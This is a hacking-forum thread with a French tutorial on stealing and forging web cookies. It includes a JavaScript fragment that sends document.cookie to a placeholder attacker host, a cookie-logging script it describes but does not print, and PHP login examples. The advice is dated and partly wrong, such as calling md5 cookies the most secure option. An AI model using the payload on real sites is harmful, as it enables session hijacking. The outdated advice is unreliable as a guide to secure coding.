نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 17/06/2010, 09:40   المشاركة رقم: 1
المعلومات
الكاتب:
  illuminat  
اللقب:
عضو مميز
الصورة الرمزية
 
الصورة الرمزية illuminat

البيانات
التسجيل : May 2010
العضوية : 134
الاهتمامات : Programming .Security
الإقامة : WAN
المواضيع : 76
الردود : 522
المجموع : 598
بمعدل : 0.10 يوميا
الاختراقات : [C0Y0T3]
مجتمعنا : []
الصنف : Gray Hat Hacker
آخر تواجد : 17/07/2013/19:28
سبب الغياب : الدراسة, العمل, العائلة
معدل التقييم: 17
نقاط التقييم: 11
illuminat is on a distinguished road
شكراً: 58
تم شكره 54 مرة في 26 مشاركة

 Algeria


الإتصالات
الحالة:
illuminat غير متواجد حالياً
وسائل الإتصال:

Cool [TUTO] Les Cookies

Nous allons voir ici comment il est possible de récupérer le cookie d'une cible en lui envoyant simplement un mail contenant un code hostile.
Nous allons ici étudier le code et la méthode employée.
Pour que le code soit exécuté, il faudra exploiter une faille du webmail visé, mais nous ne verrons pas cela ici.

La technique :
le pirate va d'abord créer un script php qui servira à enregistrer le cookie dans un fichier txt sur le ftp, il sera donc placé sur un serveur quelconque.

Code du script recup.php :

Code:
le cde ne veut pas se mettre.Je vous met le lien du tuto avec lr code ici []

Voici ce script commenté :1) Ouverture du fichier cookie.txt, il est crée s'il n'existe pas sur le serveur


2) Ecriture du contenu de la variable $cookie dans le fichier, la variable $cookie contiendra le cookie envoyé par le code javascript.
3) Fermeture du fichier sur le serveur.

Une fois ce script présent sur le serveur du pirate (donc accessible maintenant à l'adresse []).
Le pirate va maintenant se servir d'un code javascript très simple qui va écrire le contenu du cookie dans la variable cookie du script php.
Pour insérer le Javascript, le pirate va se servir de la balise "

Code Javascript :

Code:
http://site_du_pirate.com/recup.php?cookie='+document·cookie">[/url]

Le pirate n'a plu qu'a placer le code Javascript dans la source html de son email afin que ce code soit s'exécute à l'ouverture du mail par la victime.Je viens de vous démontrer ici comme il est simple de se faire voler un cookie simplement en lisant un email !Pour parer cette attaque, il suffit de désactiver l'exécution du Javascript dans les options de son navigateur web.Désactivation de cette fonction menu Demarrer, Poste de travail, Outils, Option des dossiers, Types de fichiers et cherchez VBS scipts, cliquez dessus et supprimez le.Windows par defaut laisse avec cette fonction une belle entrée à la plupart de tout les virus connus..........


TUTOS PRIS SUR []

PS: JE FERAIS UNE VIDE SUR SA SOUS PEU


JULIEN TASKCONTROLE

TUTO RAPPORTE PAR NAPOLEON

source= madchat.org

::: Les Cookies :::

Les cookies sont souvent utilisés pour des variables qui doivent être définies sur plusieurs pages du site. Ce système est donc le plus souvent utilisé pour authentifié un utilisateur/admin. C' est principalement de cette utilisation que nous allons parler ici, et des risques que les cookies font encourir.

Un rapide exemple pour comprendre le système des cookies. Imaginons une page Page1.php, avec ce code :

-------------------------------------------------
setcookie("blob","Hello World");
print("Click here");
?>
-------------------------------------------------

et une page Page2.php avec ce code :

-------------------------------------------------
echo $HTTP_COOKIE_VARS["blob"];
?>
-------------------------------------------------

Si un utilisateur se rend sur Page1.php, et clique sur le lien vers Page2.php, il y verra s' afficher"Hello World". On a donc assigné une valeur (Hello World) à une variable ($blob), qui lui sera assignée sur toutes les pages de ce sites jusqu 'à ce que le code php la change (ou un utilisateur, et c' est là un premier danger).

Le problème des cookies est que n' importe qui peut les intercepter à l' aide d' un simple javascript par exemple, ou les envoyer lui-même sur le site. Voyons comment utiliser au mieux les cookies.

Imaginons un script Login.php pour les administrateurs :

---------------------------------------------------
include("Config.php");
$pass=$HTTP_POST_VARS["pass"];
if ($pass_admin==$pass){
setcookie("logged","1");
}else{
die("Mauvais mot de passe.");
}
?>
-----------------------------------------------------

Config.php contiendrait dans notre exemple le mot de passe admin dans la variable $pass_admin. Et dans les autres pages réservées aux admins, la ligne :

------------------------------------------------------
if (!isset($HTTP_COOKIE_VARS["logged"])) { exit; }
?>
-----------------------------------------------------

Ce système n' est pas du tout sécurisé. Pour faire sauter la sécurité et accéder à la partie admin, il suffirait à un hacker d' envoyer un cookie nommé "logged" et avec n' importe quoi dedans (des softs tels HKit permettent de mettre à la portée de tous l' envoi de cookies et la gestion d'headers).
On aurait pu envoyer n' importe quoi depuis login.php dans le cookie, ça serait revenu au même, si le contrôle se limite à la ligne "if (!isset($HTTP_COOKIE_VARS["logged"])) { exit; }".

Voyons une autre possibilité de sécurité, un peu plus avancée. Toujours les mêmes pages, les même variables dans cette exemple.

Dans Login.php :

--------------------------------------------------------
include("Config.php");
$pass=$HTTP_POST_VARS["pass"];
if ($pass_admin==$pass)
{ setcookie("admin","$pass_admin");
}
else{ die("Mauvais mot de passe.");
}
?>
----------------------------------------------------------

Et dans les pages réservées aux admins :

----------------------------------------------------------
include("Config.php");
$pass=$HTTP_COOKIE_VARS["pass"];
if ($pass_admin==$pass){print "Partie admin";
}
else{ exit;
}
?>
----------------------------------------------------------

Le problème précédent venait du fait qu' on peut envoyer soi-même un cookie, ici c' est le fait qu' on puisse le récupérer qui met la sécurité du système en jeu. Prenons un exemple simple et fréquent pour récupérer le cookie : un javascript, inséré grâce à une faille Cross Site Scripting (voir mon article intitulé "Cross Site Scripting : Compréhension& sécurisation"). Il y a d' autres façons que le javascript, et dans le javascript lui-même il y a plusieurs façons de récupérer un cookie.

Un exemple commun est :

Ce script redirige vers [][LE COOKIE], donc si ce script est exécuté par un admin avec le code PHP que nous avons pris comme exemple, ça donnera une redirection vers l' url : [][PASS]; Il suffirait à un hacker de coder [] de façon à récupérer la valeur de $c, c' est-à-dire le cookie contenant le password admin, pour se logger via login.php sur le site en tant qu' admin.
On pourrait penser qu' il suffit de crypter le password envoyé dans le cookie, pour empêcher le hacker de l' utiliser, de cette façon (Login.php) :
--------------------------------------------------------------
include("Config.php");
$pass=$HTTP_POST_VARS["pass"];
if ($pass_admin==$pass){
setcookie("admin", md5($pass_admin));
}else{
die("Mauvais mot de passe.");
}
?>
--------------------------------------------------------------
Et par conséquent les pages réservées aux admins :
------------------------------------------------------------
include("Config.php");
$pass=$HTTP_COOKIE_VARS["pass"];
if (md5($pass_admin)==$pass){
print "Partie admin";
}else{
exit;
}
?>
---------------------------------------------------------------
Mais cette modification ne change rien au problème de sécurité de l' exemple d' avant, à partir du moment où on peut toujours récupérer un cookie (ce qui la plupart du temps très simple). Tout ce que ça change, c' est la façon dont le hacker va accéderà la partie admin. Il récupérera toujours le cookie contenant le mot de passe (crypté cette fois), mais au lieu de se logger via login.php, il enverra le password crypté lui-même sur les pages réservées.

Mais... il n'y a donc aucune façon sécurisée de se logger en utilisant les cookies ?

Et bien non, en effet. Sauf si l' ordinateur n' est pas accessible d' une façon ou d' une autre, ou que les admins ne peuvent pas exécuter de script (ce qui réduit les chances d' être sécurisé à 0,000001 %).

La façon la plus sécurisée est la dernière, envoyer le password crypté en md5, d' ailleurs utilisée pas des services comme PHP-Nuke, phpBB ou vBulletin.

Le mieux pour remplacer les cookies est d' utiliser les sessions.

Pour remplacer notre système, par exemple, il faudrait avoir les codes suivants (que je commente) :

Config.php :

---------------------------------------------------------------
$pass_admin="5s9P1q7z"; // Password admin
session_start(); // On lance la session
?>
---------------------------------------------------------------
Login.php :
---------------------------------------------------------------
include("Config.php"); // On inclut config.php
$pass=$HTTP_POST_VARS["pass"]; // $pass vient d' un formulaire POST
if ($pass_admin==$pass){ // Si le pass envoyé est bien celui de config.php...
session_register("pass"); // ... on enregistre la session $pass
}else{ // Sinon,...
die("Mauvais mot de passe."); // ... on affiche un message d' erreur et on arrête le script.
}
?>
---------------------------------------------------------------
Les pages réservées :
---------------------------------------------------------------
include("Config.php");
if (session_is_registered("pass")){ // Si la session $pass a bien été enregistrée...
print "Partie admin"; // ... on lance la partie admin
}else{ // Sinon,...
exit; // ... on stoppe le script.
}
?>



آخر مواضيع » illuminat

عرض البوم صور illuminat   رد مع اقتباس
قديم 31/07/2010, 07:07   المشاركة رقم: 2
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

thanks
...............

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 18
acer-dz , AnGeL25dZ , bigboss19 , black-jaguar , chinwi12 , CrashBandicot , dabelzero , Dz4Hack , hackiller , Igor000rogI , illuminat , kaku , luop1980 , MdMn HaCk3r , mohamed7x , pain96 , seif213 , ViRuS_Ra3cH

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
tuto bypass .htaccess GHOS7 [ Section Française ] 4 21/10/2014 17:05
[TUTO]Comment effacer ses traces! illuminat [ Section Française ] 1 31/07/2010 07:07

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 08:36.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115